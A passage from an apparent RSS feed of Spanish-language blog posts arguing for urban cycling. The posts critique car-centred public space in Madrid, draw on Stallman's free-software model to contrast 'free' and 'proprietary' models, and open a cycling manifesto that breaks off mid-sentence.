Esto fue así hasta el advenimiento del automóvil a motor privado. En algún momento y de manera progresiva, durante la primera mitad del siglo pasado se produce un aumento sustancial en la explotación de los recursos fósiles (sobre todo el petróleo) como fuente de energía, en especial en EE.UU. Este hecho supone una revolución que cambiara la concepción del espacio público: los grandes productores se dan cuenta de que necesitan un medio continuado de dar salida a esos recursos <a href="https://csantosb-blogs.gitlab.io/blog-personal/posts/origen-del-problema/index.html" rel="nofollow">[1]​</a>. La solución ideal reside en eliminar los medios de transporte colectivo basados en la electricidad, en beneficio del transporte individual (existente, pero minoritario hasta entonces) basado en el motor de gasolina, gran consumidor de petroleo. Pero esto no es suficiente: también es necesario apropiarse del espacio público convirtiéndolo en un bien particular. Tratándose por definición de un medio ineficiente en términos de espacio ocupado, y por ello egoísta, con el fin de aumentar su número y por tanto el beneficio económico inmediato generado, es también obligatorio alterar el diseño del espacio público, en detrimento de su uso entendido como bien común. Es el origen del <em>modelo de espacio público propietario</em> <a href="https://www.eldiario.es/cultura/libros/antonio-munoz-calles-privatizadas-entregadas-trafico-ninos-desaparecieron_1_6475059.html" rel="nofollow">[2]​</a>. <br/>
La lista de agravios es interminable, y va siempre en detrimento de la libertad de las personas: prohibición de desplazarse libremente, obligación de hacerlo siguiendo itinerarios segregados, imposición de respetar tiempos y vías limitadas para acceder a esos itinerarios. Y esto no será sino el origen: al propagarse el modelo propietario, basado en el uso del vehículo a motor privado, el espacio público como bien común se <a href="https://twitter.com/latinapaterson/status/1264929871894986753" rel="nofollow">reduce a su mínima expresión</a>. El modelo propietario es avaro: <a href="https://twitter.com/latinapaterson/status/1334082707219951618" rel="nofollow">se eliminan bulevares</a>, se reduce la anchura de los itinerarios segregados para peatones, se talan arboles, se endeuda durante décadas a las personas por el bien de unos cuantos, se degrada su salud de manera irremediable, <a href="https://twitter.com/Escenas_Urbanas/status/1332996194482745346" rel="nofollow">se alteran para siempre las plazas públicas</a>, destruyendo su riqueza, al ser necesario cada vez más espacio público para almacenar un bien individual … Como todo esto no es suficiente, se ocupan también las vías segregadas de uso peatonal. Es necesario en este punto recordar que el modelo propietario se apropia de un bien común, el espacio público, repartiéndolo para uso y disfrute únicamente de un número reducido de beneficiarios: su propia ineficacia impone un límite al número de participantes en el modelo. <br/>
<img src="https://git.sr.ht/~csantosb/csbwiki/blob/master/pics/velazquez_antes.jpg" alt="img"> <br/>
<img src="https://git.sr.ht/~csantosb/csbwiki/blob/master/pics/velazquez_despues.jpg" alt="img"> <br/>
<img src="https://git.sr.ht/~csantosb/csbwiki/blob/master/pics/velazquez_prensa.jpg" alt="img"> <br/>
El modo de funcionamiento del modelo de espacio propietario, como método de generación de beneficio económico inmediato, es por regla general siempre el mismo: restringir la libertad de los usuarios del espacio público, de modo que éstos vean limitada su capacidad de elección. El objetivo es obligar al usuario a optar por un panel limitado de opciones, aquellas propuestas por el valedor del modelo, constituyendo éstas las fuentes de beneficios económicos inmediatos. En el otro extremo, el modelo de espacio público favorece la existencia de múltiples opciones de movilidad, anima a compartir el espacio público, fomenta la complementariedad y la intermodalidad de medios de desplazamiento, promoviendo su sostenibilidad y eficiencia, haciéndolo una opción segura. <br/>
<img src="https://git.sr.ht/~csantosb/csbwiki/blob/master/pics/ppvergara_antes.jpg" alt="img"> <br/>
El éxito del modelo propietario reside en su aparente comodidad y facilidad de uso, que se refuerza con la idea de una supuesta seguridad. Se captan nuevos usuarios limitando su libertad de elegir, educándoles desde muy pronto, convenciéndoles de que una opción es la correcta al no tener conocimiento de alternativas posibles. Es por ello que el modelo propietario se asocia a menudo a la noción de pensamiento único <a href="https://cincodias.elpais.com/cincodias/2020/11/23/companias/1606133061_928294.html" rel="nofollow">[3]​</a>, que le proporciona su legitimidad. Una vez que el usuario accede al modelo de espacio público propietario es muy difícil salir de él por su propia concepción, siguiendo un camino siempre descendente, hasta que ya es demasiado tarde. Esto se puede manifestar en forma de incapacidad de desplazarse libremente, inaccesibilidad económica al modelo, imposibilidad de acceder a comercios en ausencia de un vehículo a motor, o incluso mal funcionamiento de este ultimo. Llegados a este punto, el usuario es consciente, quizás ya tarde, de hasta que punto sus opciones son limitadas encontrándose, no por casualidad, con que su libertad de elección ha dejado de existir, y se ha convertido en una persona dependiente. <br/>
<img src="https://git.sr.ht/~csantosb/csbwiki/blob/master/pics/ppvergara_despues.jpg" alt="img"> <br/>
Un claro ejemplo del modelo de espacio propietario se puede observar hoy en la ciudad de Madrid, donde históricamente se abolió la <em>“la abusiva practica de convertir en sitio de tertulia y hasta de lectura y juegos el centro de las calles y plazas”</em> <a href="https://elpais.com/ccaa/2018/02/13/madrid/1518546135_026415.html?id_externo_rsoc=TW_CC" rel="nofollow">[4]​</a>. Y esto solo fue el comienzo. Con el objetivo de disponer cada vez más espacio para los vehículos de motor, se talarían <a href="https://twitter.com/latinapaterson/status/1098121040583184384" rel="nofollow">plazas enteras</a> y se construirían megaparkings subterráneos, <a href="https://twitter.com/latinapaterson/status/1072457985832701952" rel="nofollow">arrasando para siempre</a> estos entornos. Pero esto no bastaba, el modelo de espacio propietario busca siempre acaparar más y más espacio, en detrimento del espacio público entendido como bien común, segregando a quien no se amolde a sus designios. Fue necesario inundar los bulevares peatonales de coches, convirtiéndolos en parkings urbanos, finalmente <a href="https://twitter.com/A___Moreno/status/1335616197195419650" rel="nofollow">haciendo desaparecer el bulevar</a> para poder construir autopistas urbanas de cinco carriles en un único sentido … <a href="https://twitter.com/latinapaterson/status/1204014054731321345" rel="nofollow">Los ejemplos son innombrables</a>. Heridas urbanas con forma de <a href="https://twitter.com/latinapaterson/status/1334798637046652928" rel="nofollow">autopista</a> que seccionan la ciudad en dos, marginando a parte de la población, endeudamientos colosales que la mayoría arrastraría durante décadas, desmantelamiento del sistema de tranvías eléctricos públicos, reducción de itinerarios peatonales a su mínima expresión … Como en muchas otras ciudades, el modelo de espacio propietario no ve fin a su apetito. Únicamente el beneficio económico inmediato tiene sentido a sus ojos. <br/>
<img src="https://git.sr.ht/~csantosb/csbwiki/blob/master/pics/sol.jpg" alt="img"> <br/>
<img src="https://git.sr.ht/~csantosb/csbwiki/blob/master/pics/motos.jpg" alt="img"> <br/>
<em>Gracias a <a href="https://twitter.com/latinapaterson/" rel="nofollow">@latinapaterson</a>, [@EscenasUrbanas](<a href="https://twitter.com/Escenas" rel="nofollow">https://twitter.com/Escenas</a></em>Urbanas) y <a href="https://twitter.com/gatopormadrid" rel="nofollow">@gatopormadrid</a> por su recopilacion de fotografias antiguas de la ciudad <br/>
de Madrid_ <br/></p>

<h1 id="referencias">Referencias</h1>

<p>    <a href="https://infosec.press/csantosb/el-origen-del-problema" rel="nofollow">El origen del problema</a> <br/>
    <a href="https://www.eldiario.es/cultura/libros/antonio-munoz-calles-privatizadas-entregadas-trafico-ninos-desaparecieron_1_6475059.html" rel="nofollow">“Las calles fueron privatizadas y entregadas al trafico y los ninos desaparecieron de ellas”</a> <br/>
    <a href="https://cincodias.elpais.com/cincodias/2020/11/23/companias/1606133061_928294.html" rel="nofollow">El Gobierno inyectara al automovil 10.000 millones de fondos europeos en tres anos</a> <br/>
    <a href="https://elpais.com/ccaa/2018/02/13/madrid/1518546135_026415.html" rel="nofollow">Cuando los madrileños aprendieron a circular</a> <br/></p>

<p>#ciclismourbanolibre #bici <br/></p>
]]></content:encoded>
      <author>ideas</author>
      <guid>https://infosec.press/read/a/ogos76fwwg</guid>
      <pubDate>Sat, 18 Jan 2025 15:56:57 +0000</pubDate>
    </item>
    <item>
      <title>Sobre el ciclismo urbano libre (i)</title>
      <link>https://infosec.press/ideas/sobre-el-ciclismo-urbano-libre-i</link>
      <description>&lt;![CDATA[img br/&#xA;En “Free as in Freedom (2.0)” [1]​, Richard Stallman narra el origen del movimiento de código libre que el mismo encabeza desde hace décadas. Este movimiento, punto de partida tanto de un porcentaje elevado del código sin el cual el mundo que conocemos no sería posible, como de una interpretación original de lo que suponen los bienes comunes, puede entenderse como una base sólida a partir de la cual intentar desarrollar una generalización teórica más amplia de lo que constituyen hoy los modelos libres, así como de sus antagónicos modelos propietarios respectivos. !--more-- br/&#xA;Articulo Sobre ciclismo urbano libre br/&#xA;&#xA;Modelos de código libre y propietario&#xA;&#xA;En la época en la que Stallman se une al laboratorio de inteligencia artificial del MIT, el código informático es de uso libre. Salvando las distancias, éste se asemeja a una receta de cocina: algo que no pertenece a nadie en particular y que no es posible explotar en beneficio propio únicamente. Muy al contrario, se trata de algo que podría definirse como un bien común: un conocimiento extendido que se comparte, del que todo el mundo se beneficia y enriquece. El código es algo libre, un bien colectivo que todo el mundo puede estudiar y modificar, aportando mejoras que redunden en el beneficio común. Ese es el caldo de cultivo en el que se cimenta un movimiento que no puede considerarse como original en su concepción, pero sí en la definición de sus objetivos. Es el modelo de código informático libre. br/&#xA;Hacia el final de los años 70 se produce un evento germinal. Un día cualquiera en el MIT, una impresora produce un error: al intentar corregir el fallo en el código como tantas otras veces, los integrantes del laboratorio se encuentran frente a un hecho que les resulta completamente extraño. Son conscientes por vez primera de no tener acceso al código fuente de la impresora y, por lo tanto, no son capaces de poder estudiarlo y reparar el error. Ese momento, el de afrontar por vez primera un código propietario (cerrado e inaccesible) es el origen de la frustración de Stallman, constituyendo por oposición el embrión del movimiento de código libre (abierto y modificable). Es el origen del modelo de código informático propietario. br/&#xA;La gran mayoría de las personas, pasada la sorpresa inicial, acabaron adhiriendo al modelo de código propietario, muy extendido hoy día, aunque no todas. Las más reticentes, educadas en un modelo cuya premisa fundamental es que compartir favorece al colectivo, y por lo tanto indirectamente al individuo, se lanzaron a escribir código abierto y libre, compartiéndolo con todo aquel que mostrara interés. A cambio, se le pedía únicamente que al aportar mejoras al código, éste fuera igualmente compartido: aceptar el modelo abierto implicaba hacerlo en beneficio mutuo. Hoy, el movimiento se ha expandido y a pesar de continuar siendo minoritario, puede considerarse como un sinónimo de libertad, seguridad y deseo de compartir los bienes comunes. br/&#xA;El modo de funcionamiento habitual del modelo de código propietario suele consistir en recortar la libertad de los usuarios, educándoles desde muy pronto en la existencia de un único modelo [2]​, de modo que vean restringida su capacidad de elección a un número limitado de códigos, generalmente relacionados entre ellos por fuertes dependencias, eliminando toda compatibilidad con otros códigos. El usuario debe optar por un conjunto acotado de soluciones, siempre las mismas independientemente de sus necesidades particulares, debiendo ser él quien se adapte a esas soluciones, gratuitas [3]​ y de uso directo únicamente en apariencia, que constituirán una fuente de beneficios económicos inmediatos para el beneficiario del modelo en forma bien de dinero, bien en forma de obtención de los datos personales del usuario [4]​. Un pensamiento único fomentado y dirigido por el beneficiario del modelo proporcionará a éste el entorno adecuado para su expansión, legitimándolo, al mismo tiempo que se propaga la idea de peligrosidad e inseguridad en todo aquel código informático que no tenga por origen el valedor del modelo propietario. El modelo de código libre, abierto, propulsor de código legible y seguro se ve así relegado a un ámbito minoritario de adeptos. br/&#xA;Desde el momento en que el usuario accede al modelo de código propietario es muy difícil salir de él, hasta llegar a un punto de no retorno que se puede manifestar en forma de incapacidad de acceder a sus propios datos, debiendo por lo tanto perpetuar el uso de códigos propietarios si se quiere poder seguir utilizando esos datos; inaccesibilidad económica al modelo, oneroso por definición; imposibilidad hardware de hacer funcionar el código propietario debido a los elevados recursos que consuma éste e incluso obligación de renovar periódicamente dicho hardware, con el coste asociado; mal funcionamiento del código propietario, sin alternativa posible por incompatibilidad con otros códigos; fallos de seguridad ignorados por no ser un código auditable, lo que conlleva a la imposibilidad de continuar usando ese código, etc. Llegado a este punto, el usuario se encuentra frente a una fuerte relación de dependencia, siendo consciente de que su libertad de elección ha cesado de existir en gran medida. br/&#xA;&#xA;Generalidades del modelo propietario&#xA;&#xA;Los puntos anteriores, específicos al modelo de código informático, se pueden generalizar extrayendo pautas comunes a todos los modelos propietarios. El modo de funcionamiento del modelo propietario, como método de generación de beneficio económico inmediato, es por regla general siempre el mismo, pudiéndose también extender a otros ámbitos. Se limita la libertad de los usuarios, de modo que éstos vean condicionada su capacidad de elección, poniendo coto de esta manera al modelo libre anteriormente en vigor. El objetivo será siempre el de forzar al usuario a optar por un panel limitado de opciones, invariablemente las mismas independientemente de sus necesidades particulares, únicamente sencillas y ventajosas para él en apariencia, aquellas propuestas por el valedor del modelo propietario, constituyendo éstas las fuentes de beneficios económicos inmediatos. Estos beneficios se producen de forma directa (económica) o indirecta (datos, dependencia del usuario, erradicación de un obstáculo al modelo propietario, obsolescencia programada, etc.). El modelo libre en vigor hasta el advenimiento del modelo propietario favorece la existencia de múltiples opciones, elimina las barreras artificiales que limiten la libertad del usuario, anima a la colaboración pública y al reparto de los bienes comunes, fomentando la compatibilidad y la interoperatividad, promoviendo las soluciones auditables e intercambiables, que serán en consecuencia seguras. El modelo propietario acaba con estas ventajas de manera definitiva, impidiendo la posibilidad de volver atrás, garantizando así su propia supervivencia. br/&#xA;El éxito del modelo propietario, desde el punto de vista del usuario, reside en su aparente conveniencia, economía, simplicidad y facilidad de uso. Esto será tanto más así desde el momento en que se hace abstracción de las implicaciones y consecuencias del modelo, puesto que solamente se considera el bien individual y no el bien común. Desde el punto de vista del modelo propietario, únicamente el beneficio económico inmediato es relevante. Se procura captar poco a poco nuevos usuarios, limitando de manera progresiva su libertad de elección, educándoles desde muy pronto en la existencia de un único modelo, al que el usuario deberá adaptarse independientemente de sus necesidades particulares, convenciéndole de que esta opción es la correcta al no tener conocimiento de alternativas posibles, o persuadiéndoles de que son alternativas complejas, al alcance de solamente unos pocos, inseguras u onerosas. Es por ello que el modelo propietario se asocia a menudo a la noción de pensamiento único, englobando todo lo anterior, que será quien le proporcione su marco de legitimidad. br/&#xA;Una vez que el usuario accede y se habitúa al modelo propietario es muy difícil salir de él debido a su propia concepción, siguiendo un camino siempre descendente, hasta que ya es demasiado tarde. Esto se puede manifestar en forma de incapacidad física o psicológica de acceder a ninguna otra alternativa, falta de conocimientos o de la educación necesaria para escapar del modelo, inaccesibilidad económica al mismo, imposibilidad de hacer un correcto uso del modelo o incluso un funcionamiento deficiente de este ultimo. Al haberse imposibilitado el acceso a otras opciones, el usuario se encuentra en una trampa. Llegados a este punto, el usuario es consciente, quizás ya tarde, de hasta que punto sus posibilidades son limitadas encontrándose, no por casualidad, con que su libertad de elección ha sido coartada de manera considerable, habiéndose convertido en este contexto en una persona dependiente. br/&#xA;&#xA;Ejemplos&#xA;&#xA;Los modelos libre y propietario pueden extrapolarse a muchos otros ámbitos más allá del código informático, siguiendo siempre unas pautas generales que serán muy similares a las anteriores. Para concluir con la primera parte de este artículo, es interesante mencionar algunos modelos en vigor actualmente, aunque la lista podría ser mucho mas larga. br/&#xA;Un primer ejemplo lo supone el uso de semillas de cultivo en agricultura. Desde la revolución neolítica hasta finales del siglo xx, el modelo libre consistente en reutilizar una parte de la cosecha para poder replantar y producir nuevas cosechas ha sido el modelo predominante (modelo libre anteriormente en vigor). Este modelo permite el libre intercambio de semillas (un bien común) de cultivo y de conocimientos sobre la mejor alternativa (existencia de múltiples opciones), la mejor época del año en la que sembrar, las mejores condiciones, los cuidados, etc. (anima a la colaboración pública y al reparto de los bienes comunes, fomentando la compatibilidad y la interoperatividad, promoviendo las soluciones auditables e intercambiables). Recientemente, el modelo antagónico propietario comienza a imponerse [5]​: únicamente cierto tipo de semillas (panel limitado de opciones) han de ser adquiridas (se limita la libertad de los usuarios) por todos los agricultores (el usuario deberá adaptarse independientemente de sus necesidades particulares) y producen cosechas no fértiles que contaminan además a las que si lo son (el modelo garantiza su propia supervivencia). br/&#xA;El éxito del modelo propietario en este caso se basa en la aparente robustez de las semillas propietarias (aparente conveniencia), garantizando una cosecha segura y a medida (aparente simplicidad), que además tendrá un precio reducido inicialmente (aparente economía), al evitarse costes de almacenamiento, redundando en una mejor salida al mercado (aparente facilidad de uso). Esto suele ir a menudo en detrimento de la calidad de la cosecha (solamente se considera el bien individual y no el bien común), que se convierte en un factor secundario: tan solo el beneficio económico inmediato es relevante (directo económico, e indirecto por ausencia de competencia). El modelo libre poco a poco se va relegando y se convierte en algo minoritario [6]​, pues una línea argumental omnipresente (noción de pensamiento único) se impone y lo considera arriesgado e ineficiente (persuadiéndoles de que son alternativas complejas, al alcance de solamente unos pocos, inseguras u onerosas). Poco a poco se va creando una relación de dependencia de la que es muy difícil escapar. La libertad del agricultor se ve cada vez más limitada, tanto económicamente como desde el punto de vista de su capacidad de elección. Este modelo además está adquiriendo tintes de sofisticación insospechados, puesto que la dependencia de la agricultura con pesticidas y maquinaria compleja es cada vez más notable, y sin someterse a estas ligaduras artificiales cada vez es más difícil alcanzar una producción aceptable. br/&#xA;&#xA;Referencias&#xA;&#xA;Free as in Freedom 2.0 br/&#xA;Acuerdo de Educacion con Google y Microsoft br/&#xA;Office 365 gratis educación br/&#xA;El nuevo petroleo son los datos, y todo el negocio está en sólo tres compañías br/&#xA;El mundo según Monsanto br/&#xA;Les défis d‘une autre agriculture br/&#xA;&#xA;#ciclismourbanolibre #bicicleta br/]]&gt;</description>
      <content:encoded><![CDATA[<p><img src="https://git.sr.ht/~csantosb/csbwiki/blob/master/pics/sobre-la-libertad.png" alt="img"> <br/>
En “Free as in Freedom (2.0)” <a href="https://www.fsf.org/faif" rel="nofollow">[1]​</a>, Richard Stallman narra el origen del movimiento de código libre que el mismo encabeza desde hace décadas. Este movimiento, punto de partida tanto de un porcentaje elevado del código sin el cual el mundo que conocemos no sería posible, como de una interpretación original de lo que suponen los bienes comunes, puede entenderse como una base sólida a partir de la cual intentar desarrollar una generalización teórica más amplia de lo que constituyen hoy los modelos libres, así como de sus antagónicos modelos propietarios respectivos.  <br/>
<em>Articulo</em> <a href="https://infosec.press/ideas/tag:ciclismourbanolibre" rel="nofollow">Sobre ciclismo urbano libre</a> <br/></p>

<h1 id="modelos-de-código-libre-y-propietario">Modelos de código libre y propietario</h1>

<p>En la época en la que Stallman se une al laboratorio de inteligencia artificial del MIT, el código informático es de uso libre. Salvando las distancias, éste se asemeja a una receta de cocina: algo que no pertenece a nadie en particular y que no es posible explotar en beneficio propio únicamente. Muy al contrario, se trata de algo que podría definirse como un bien común: un conocimiento extendido que se comparte, del que todo el mundo se beneficia y enriquece. El código es algo libre, un bien colectivo que todo el mundo puede estudiar y modificar, aportando mejoras que redunden en el beneficio común. Ese es el caldo de cultivo en el que se cimenta un movimiento que no puede considerarse como original en su concepción, pero sí en la definición de sus objetivos. Es el <em>modelo de código informático libre</em>. <br/>
Hacia el final de los años 70 se produce un evento germinal. Un día cualquiera en el MIT, una impresora produce un error: al intentar corregir el fallo en el código como tantas otras veces, los integrantes del laboratorio se encuentran frente a un hecho que les resulta completamente extraño. Son conscientes por vez primera de no tener acceso al código fuente de la impresora y, por lo tanto, no son capaces de poder estudiarlo y reparar el error. Ese momento, el de afrontar por vez primera un código propietario (cerrado e inaccesible) es el origen de la frustración de Stallman, constituyendo por oposición el embrión del movimiento de código libre (abierto y modificable). Es el origen del <em>modelo de código informático propietario.</em> <br/>
La gran mayoría de las personas, pasada la sorpresa inicial, acabaron adhiriendo al modelo de código propietario, muy extendido hoy día, aunque no todas. Las más reticentes, educadas en un modelo cuya premisa fundamental es que compartir favorece al colectivo, y por lo tanto indirectamente al individuo, se lanzaron a escribir código abierto y libre, compartiéndolo con todo aquel que mostrara interés. A cambio, se le pedía únicamente que al aportar mejoras al código, éste fuera igualmente compartido: aceptar el modelo abierto implicaba hacerlo en beneficio mutuo. Hoy, el movimiento se ha expandido y a pesar de continuar siendo minoritario, puede considerarse como un sinónimo de libertad, seguridad y deseo de compartir los bienes comunes. <br/>
El modo de funcionamiento habitual del modelo de código propietario suele consistir en recortar la libertad de los usuarios, educándoles desde muy pronto en la existencia de un único modelo <a href="https://sevilla.abc.es/andalucia/sevi-acuerdo-educacion-google-y-microsoft-para-dotar-nuevas-herramientas-colegios-publicos-202011281415_noticia.html" rel="nofollow">[2]​</a>, de modo que vean restringida su capacidad de elección a un número limitado de códigos, generalmente relacionados entre ellos por fuertes dependencias, eliminando toda compatibilidad con otros códigos. El usuario debe optar por un conjunto acotado de soluciones, siempre las mismas independientemente de sus necesidades particulares, debiendo ser él quien se adapte a esas soluciones, gratuitas <a href="https://www.microsoft.com/es-es/education/products/office" rel="nofollow">[3]​</a> y de uso directo únicamente en apariencia, que constituirán una fuente de beneficios económicos inmediatos para el beneficiario del modelo en forma bien de dinero, bien en forma de obtención de los datos personales del usuario <a href="https://situacioncritica.es/blog/el-nuevo-petroleo-son-los-datos/" rel="nofollow">[4]​</a>. Un pensamiento único fomentado y dirigido por el beneficiario del modelo proporcionará a éste el entorno adecuado para su expansión, legitimándolo, al mismo tiempo que se propaga la idea de peligrosidad e inseguridad en todo aquel código informático que no tenga por origen el valedor del modelo propietario. El modelo de código libre, abierto, propulsor de código legible y seguro se ve así relegado a un ámbito minoritario de adeptos. <br/>
Desde el momento en que el usuario accede al modelo de código propietario es muy difícil salir de él, hasta llegar a un punto de no retorno que se puede manifestar en forma de incapacidad de acceder a sus propios datos, debiendo por lo tanto perpetuar el uso de códigos propietarios si se quiere poder seguir utilizando esos datos; inaccesibilidad económica al modelo, oneroso por definición; imposibilidad hardware de hacer funcionar el código propietario debido a los elevados recursos que consuma éste e incluso obligación de renovar periódicamente dicho hardware, con el coste asociado; mal funcionamiento del código propietario, sin alternativa posible por incompatibilidad con otros códigos; fallos de seguridad ignorados por no ser un código auditable, lo que conlleva a la imposibilidad de continuar usando ese código, etc. Llegado a este punto, el usuario se encuentra frente a una fuerte relación de dependencia, siendo consciente de que su libertad de elección ha cesado de existir en gran medida. <br/></p>

<h1 id="generalidades-del-modelo-propietario">Generalidades del modelo propietario</h1>

<p>Los puntos anteriores, específicos al modelo de código informático, se pueden generalizar extrayendo pautas comunes a todos los modelos propietarios. El modo de funcionamiento del modelo propietario, como método de generación de beneficio económico inmediato, es por regla general siempre el mismo, pudiéndose también extender a otros ámbitos. Se limita la libertad de los usuarios, de modo que éstos vean condicionada su capacidad de elección, poniendo coto de esta manera al modelo libre anteriormente en vigor. El objetivo será siempre el de forzar al usuario a optar por un panel limitado de opciones, invariablemente las mismas independientemente de sus necesidades particulares, únicamente sencillas y ventajosas para él en apariencia, aquellas propuestas por el valedor del modelo propietario, constituyendo éstas las fuentes de beneficios económicos inmediatos. Estos beneficios se producen de forma directa (económica) o indirecta (datos, dependencia del usuario, erradicación de un obstáculo al modelo propietario, obsolescencia programada, etc.). El modelo libre en vigor hasta el advenimiento del modelo propietario favorece la existencia de múltiples opciones, elimina las barreras artificiales que limiten la libertad del usuario, anima a la colaboración pública y al reparto de los bienes comunes, fomentando la compatibilidad y la interoperatividad, promoviendo las soluciones auditables e intercambiables, que serán en consecuencia seguras. El modelo propietario acaba con estas ventajas de manera definitiva, impidiendo la posibilidad de volver atrás, garantizando así su propia supervivencia. <br/>
El éxito del modelo propietario, desde el punto de vista del usuario, reside en su aparente conveniencia, economía, simplicidad y facilidad de uso. Esto será tanto más así desde el momento en que se hace abstracción de las implicaciones y consecuencias del modelo, puesto que solamente se considera el bien individual y no el bien común. Desde el punto de vista del modelo propietario, únicamente el beneficio económico inmediato es relevante. Se procura captar poco a poco nuevos usuarios, limitando de manera progresiva su libertad de elección, educándoles desde muy pronto en la existencia de un único modelo, al que el usuario deberá adaptarse independientemente de sus necesidades particulares, convenciéndole de que esta opción es la correcta al no tener conocimiento de alternativas posibles, o persuadiéndoles de que son alternativas complejas, al alcance de solamente unos pocos, inseguras u onerosas. Es por ello que el modelo propietario se asocia a menudo a la noción de pensamiento único, englobando todo lo anterior, que será quien le proporcione su marco de legitimidad. <br/>
Una vez que el usuario accede y se habitúa al modelo propietario es muy difícil salir de él debido a su propia concepción, siguiendo un camino siempre descendente, hasta que ya es demasiado tarde. Esto se puede manifestar en forma de incapacidad física o psicológica de acceder a ninguna otra alternativa, falta de conocimientos o de la educación necesaria para escapar del modelo, inaccesibilidad económica al mismo, imposibilidad de hacer un correcto uso del modelo o incluso un funcionamiento deficiente de este ultimo. Al haberse imposibilitado el acceso a otras opciones, el usuario se encuentra en una trampa. Llegados a este punto, el usuario es consciente, quizás ya tarde, de hasta que punto sus posibilidades son limitadas encontrándose, no por casualidad, con que su libertad de elección ha sido coartada de manera considerable, habiéndose convertido en este contexto en una persona dependiente. <br/></p>

<h1 id="ejemplos">Ejemplos</h1>

<p>Los modelos libre y propietario pueden extrapolarse a muchos otros ámbitos más allá del código informático, siguiendo siempre unas pautas generales que serán muy similares a las anteriores. Para concluir con la primera parte de este artículo, es interesante mencionar algunos modelos en vigor actualmente, aunque la lista podría ser mucho mas larga. <br/>
Un primer ejemplo lo supone el uso de semillas de cultivo en agricultura. Desde la revolución neolítica hasta finales del siglo xx, el modelo libre consistente en reutilizar una parte de la cosecha para poder replantar y producir nuevas cosechas ha sido el modelo predominante (<em>modelo libre anteriormente en vigor</em>). Este modelo permite el libre intercambio de semillas (<em>un bien común</em>) de cultivo y de conocimientos sobre la mejor alternativa (<em>existencia de múltiples opciones</em>), la mejor época del año en la que sembrar, las mejores condiciones, los cuidados, etc. (<em>anima a la colaboración pública y al reparto de los bienes comunes, fomentando la compatibilidad y la interoperatividad, promoviendo las soluciones auditables e intercambiables</em>). Recientemente, el modelo antagónico propietario comienza a imponerse <a href="https://www.wikiwand.com/es/El_mundo_seg%C3%BAn_Monsanto" rel="nofollow">[5]​</a>: únicamente cierto tipo de semillas (<em>panel limitado de opciones</em>) han de ser adquiridas (<em>se limita la libertad de los usuarios</em>) por todos los agricultores (<em>el usuario deberá adaptarse independientemente de sus necesidades particulares</em>) y producen cosechas no fértiles que contaminan además a las que si lo son (<em>el modelo garantiza su propia supervivencia</em>). <br/>
El éxito del modelo propietario en este caso se basa en la aparente robustez de las semillas propietarias (<em>aparente conveniencia</em>), garantizando una cosecha segura y a medida (<em>aparente simplicidad</em>), que además tendrá un precio reducido inicialmente (<em>aparente economía</em>), al evitarse costes de almacenamiento, redundando en una mejor salida al mercado (<em>aparente facilidad de uso</em>). Esto suele ir a menudo en detrimento de la calidad de la cosecha (<em>solamente se considera el bien individual y no el bien común</em>), que se convierte en un factor secundario: tan solo el beneficio económico inmediato es relevante (<em>directo económico, e indirecto por ausencia de competencia</em>). El modelo libre poco a poco se va relegando y se convierte en algo minoritario <a href="https://www.youtube.com/watch?v=_vAR8vDMjcw" rel="nofollow">[6]​</a>, pues una línea argumental omnipresente (<strong>noción de pensamiento único</strong>) se impone y lo considera arriesgado e ineficiente (<em>persuadiéndoles de que son alternativas complejas, al alcance de solamente unos pocos, inseguras u onerosas</em>). Poco a poco se va creando una relación de dependencia de la que es muy difícil escapar. La libertad del agricultor se ve cada vez más limitada, tanto económicamente como desde el punto de vista de su capacidad de elección. Este modelo además está adquiriendo tintes de sofisticación insospechados, puesto que la dependencia de la agricultura con pesticidas y maquinaria compleja es cada vez más notable, y sin someterse a estas ligaduras artificiales cada vez es más difícil alcanzar una producción aceptable. <br/></p>

<h1 id="referencias">Referencias</h1>
<ol><li><a href="https://www.fsf.org/faif" rel="nofollow">Free as in Freedom 2.0</a> <br/></li>
<li><a href="https://sevilla.abc.es/andalucia/sevi-acuerdo-educacion-google-y-microsoft-para-dotar-nuevas-herramientas-colegios-publicos-202011281415_noticia.html" rel="nofollow">Acuerdo de Educacion con Google y Microsoft</a> <br/></li>
<li><a href="https://www.microsoft.com/es-es/education/products/office" rel="nofollow">Office 365 gratis educación</a> <br/></li>
<li><a href="https://situacioncritica.es/blog/el-nuevo-petroleo-son-los-datos/" rel="nofollow">El nuevo petroleo son los datos, y todo el negocio está en sólo tres compañías</a> <br/></li>
<li><a href="https://www.wikiwand.com/es/El_mundo_seg%C3%BAn_Monsanto" rel="nofollow">El mundo según Monsanto</a> <br/></li>
<li><a href="https://www.youtube.com/watch?v=_vAR8vDMjcw" rel="nofollow">Les défis d‘une autre agriculture</a> <br/></li></ol>

<p>#ciclismourbanolibre #bicicleta <br/></p>
]]></content:encoded>
      <author>ideas</author>
      <guid>https://infosec.press/read/a/1l02chdw02</guid>
      <pubDate>Sat, 18 Jan 2025 15:52:56 +0000</pubDate>
    </item>
    <item>
      <title>Manifiesto por un ciclismo urbano libre</title>
      <link>https://infosec.press/ideas/manifiesto-por-un-ciclismo-urbano-libre</link>
      <description>&lt;![CDATA[img br/&#xA;La idea fundamental que pretende promover este manifiesto es la defensa de la #bicicleta urbana como medio de desplazamiento cotidiano en igualdad de condiciones con los demás vehículos. El ciclismo urbano libre e integrado defiende la circulación ciclista usando el centro del carril en calzada porque es más seguro, y afirma que es posible usar toda la ciudad, sin necesidad de esperar a que la ciudad se adapte a la bicicleta. br/&#xA;Este manifiesto conduce a algunas implicaciones prácticas. !--more-- br/&#xA;&#xA;Manifiesto&#xA;&#xA;El modelo ciclista urbano libre e integrador observa la bicicleta como un vehículo, y como tal debe circular por la calzada, en igualdad de condiciones con el resto de vehículos. br/&#xA;Se fundamenta en cuatro principios: br/&#xA;&#xA;La bicicleta es un vehículo br/&#xA;    Y debe comportarse como todos los demás vehículos br/&#xA;    La posición de un vehículo en calzada no depende del tipo de vehículo, sino de su posición y de las maniobras que necesite ejecutar. Por lo tanto, la bicicleta debe adaptar su posición en función de su destino. br/&#xA;Respeto de las reglas de circulación br/&#xA;    Es necesario ser siempre previsible para el resto de vehículos br/&#xA;    Las reglas de circulación son el resultado de un acuerdo común entre todos los usuarios del espacio público. El ciclista debe respetar las reglas comunes, es la manera más sencilla de ganar respeto y de asegurar la compartición de la vía publica con los peatones y los demás vehículos. br/&#xA;    Ser visible br/&#xA;        La seguridad del ciclista dependerá siempre de ser visible para el resto de usuarios br/&#xA;        Es por ello imperativo usar siempre el centro de la calzada, minimizando riesgos, en el lugar donde el ciclista será más visible y tendrá más espacio para reaccionar a cualquier imprevisto. br/&#xA;La acera pertenece a los peatones br/&#xA;    Si es 